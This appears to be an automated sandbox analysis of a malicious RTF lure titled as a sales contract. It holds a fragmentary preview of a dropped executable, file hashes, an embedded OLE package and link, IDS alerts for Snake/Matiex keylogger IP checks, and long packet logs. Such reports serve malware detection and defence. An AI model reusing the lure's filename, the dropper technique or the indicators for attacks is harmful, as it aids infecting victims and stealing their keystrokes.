                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c................................. ........@.. ....................... ............@.....................................W.......\............................................................................ ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H...........9......S....`...&..........................................z.(......}.....(....o....}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....ok...:q....(....+..(........}.........(......*................n..}.....{....,..{....oT...*..{....*.s..
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):162
                                    Entropy (8bit):2.503835550707525
                                    Encrypted:false
                                    SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                                    MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                                    SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                                    SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                                    SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                                    Malicious:false
                                    Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
                                    File type:Rich Text Format data, unknown version
                                    Entropy (8bit):3.1529159367533333
                                    TrID:
                                    • Rich Text Format (5005/1) 55.56%
                                    • Rich Text Format (4004/1) 44.44%
                                    File name:Revised sales contract for Crosswear.rtf
                                    File size:232189
                                    MD5:74ab9855f26b0cc2fca1fefd566f5642
                                    SHA1:09ebb7681f9989b7e98a17cbbff3cd7783712874
                                    SHA256:cda65753e2459754b1afd749ac2ce1c65415de966179e9bb53e822321c02c7ff
                                    SHA512:323c7219f267641386922739dbfb33cc9963891a3418e0f4d454d73df9f3a2d4848891f32ca60d64a6f822497fdbcfef8ac35cea4ac25ea02c5ca6929b6820d1
                                    SSDEEP:1536:icLLLLKDDABpYm3JH0qMPzdps5oE0g/y47ZVzFz76mAg5eeVhMDw5wfLD:icLLLLk9EjVzFtr5RDAw5wf/
                                    TLSH:6934FDB0655F08B6D308ED5E25A4B245AEB9FEE734C1547223AFE034CF59AF29EC8540
                                    File Content Preview:{\rtf\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\fnhsfBi58207\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c6673647
                                    Icon Hash:e4eea2aaa4b4b4a4
                                    IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                    000000959h2embeddedpackage20019DRdtfhgYgeghDp.scTC:\nsdsTggH\DRdtfhgYgeghDp.scTC:\8jkepaD\DRdtfhgYgeghDp.scTno
                                    10000ACF1h2embeddedOLE2LInk2560no
                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    192.168.2.22132.226.8.16949173802842536 08/23/22-13:43:14.345361TCP2842536ETPRO TROJAN 404/Snake/Matiex Keylogger Style External IP Check4917380192.168.2.22132.226.8.169
                                    192.168.2.22193.122.130.049175802842536 08/23/22-13:43:56.802113TCP2842536ETPRO TROJAN 404/Snake/Matiex Keylogger Style External IP Check4917580192.168.2.22193.122.130.0
                                    192.168.2.22193.122.130.049174802842536 08/23/22-13:43:29.255487TCP2842536ETPRO TROJAN 404/Snake/Matiex Keylogger Style External IP Check4917480192.168.2.22193.122.130.0
                                    TimestampSource PortDest PortSource IPDest IP
                                    Aug 23, 2022 13:42:48.272356987 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.335551977 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.335788965 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.336560965 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.397682905 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.425309896 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.425352097 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.425385952 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.425389051 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.425416946 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.425430059 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.425432920 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.425468922 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.425476074 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.425508022 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.425513029 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.425545931 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.425551891 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.425584078 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.425587893 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.425621986 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.425628901 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.425657988 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.425663948 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.425702095 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.429686069 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.486007929 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.486063957 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.486104012 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.486135960 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.486144066 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.486171961 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.486176968 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.486186028 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.486187935 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.486238956 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.486287117 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.486367941 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.486377954 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.486419916 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.486421108 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.486460924 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.486465931 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.486510992 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.486511946 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.486552000 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.486562967 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.486594915 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.486598015 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.486634970 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.486637115 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.486676931 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.486677885 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.486718893 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.486762047 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.486804008 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.486804962 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.486844063 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.486848116 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.486852884 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.486860991 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.486886024 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.486887932 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.486929893 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.486934900 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.486972094 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.490039110 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.547285080 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.547386885 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.547405005 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.547502041 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.547503948 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.547550917 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.547561884 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.547595024 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.547610044 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.547640085 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.547650099 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.547682047 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.547708988 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.547724962 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.547770977 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.547775030 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.547796965 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.547815084 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.547848940 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.547858953 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.547873020 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.547899008 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.547920942 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.547941923 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.547945023 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.547983885 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.548017979 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.548024893 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.548033953 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.548067093 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.548100948 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.548110008 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.548154116 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.548160076 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.548190117 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.548198938 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.548209906 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.548239946 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.548266888 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.548283100 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.548296928 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.548329115 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.548352957 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.548369884 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.548382998 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.548410892 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.548413038 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.548458099 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.548496008 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.548501015 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.548513889 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.548546076 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.548574924 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.548587084 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.548605919 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.548629045 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.548662901 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.548674107 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.548686981 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.548728943 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.548758030 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.548770905 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.548783064 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.548814058 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.548837900 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.548854113 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.548856974 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.548897028 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.548916101 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.548943043 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.548984051 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.549012899 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.549529076 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.550374031 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.550421953 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.550461054 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.550466061 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.550482988 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.550510883 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.550538063 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.550570965 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.551789999 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.552376032 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.609273911 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.609332085 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.609375954 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.609416008 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.609415054 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.609457970 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.609464884 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.609471083 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.609498024 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.609498978 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.609536886 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.609538078 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.609576941 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.609579086 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.609616995 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.609623909 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.609662056 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.609662056 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.609699965 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.609704018 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.609740973 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.609745026 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.609782934 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.609785080 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.609824896 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.609826088 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.609864950 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.609867096 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.609906912 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.609909058 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.609954119 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.609956980 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.609993935 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610003948 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610030890 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610035896 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610076904 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610097885 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610110998 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610116959 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610155106 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610160112 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610200882 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610200882 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610240936 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610243082 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610285044 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610285997 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610323906 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610326052 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610363007 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610367060 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610404968 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610407114 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610444069 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610446930 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610487938 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610491037 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610531092 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610538960 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610572100 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610574007 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610615015 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610616922 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610656977 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610661983 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610697985 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610701084 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610733986 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610738993 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610778093 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610779047 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610815048 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610817909 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610855103 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610857964 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610896111 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610898972 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610935926 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610941887 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.610977888 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.610980988 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.611017942 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.611021996 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.611059904 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.611063957 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.611100912 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.611718893 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.611814976 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.611856937 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.611875057 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.611901999 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.612373114 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.612413883 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.612426996 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.612454891 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.612914085 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.613130093 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.671358109 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.671389103 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.671410084 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.671412945 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.671427011 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.671447992 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.671451092 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.671466112 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.671469927 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.671484947 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.671500921 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.671504021 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.671613932 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.672343016 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.672363043 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.672379971 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.672399998 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.672408104 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.672420979 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.672421932 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.672441006 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.672441959 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.672451973 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.672461987 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.672475100 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.672482014 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.672499895 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.672534943 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.672540903 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.672569036 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.672569036 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.672590017 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.672607899 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.672610044 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.672621012 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.672631025 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.672646999 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.672647953 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.672667027 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.672700882 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.672727108 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.672745943 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.672769070 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.672779083 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.672873974 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.672905922 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.672955990 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:48.672974110 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.672988892 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:48.673072100 CEST8049171141.8.192.151192.168.2.22
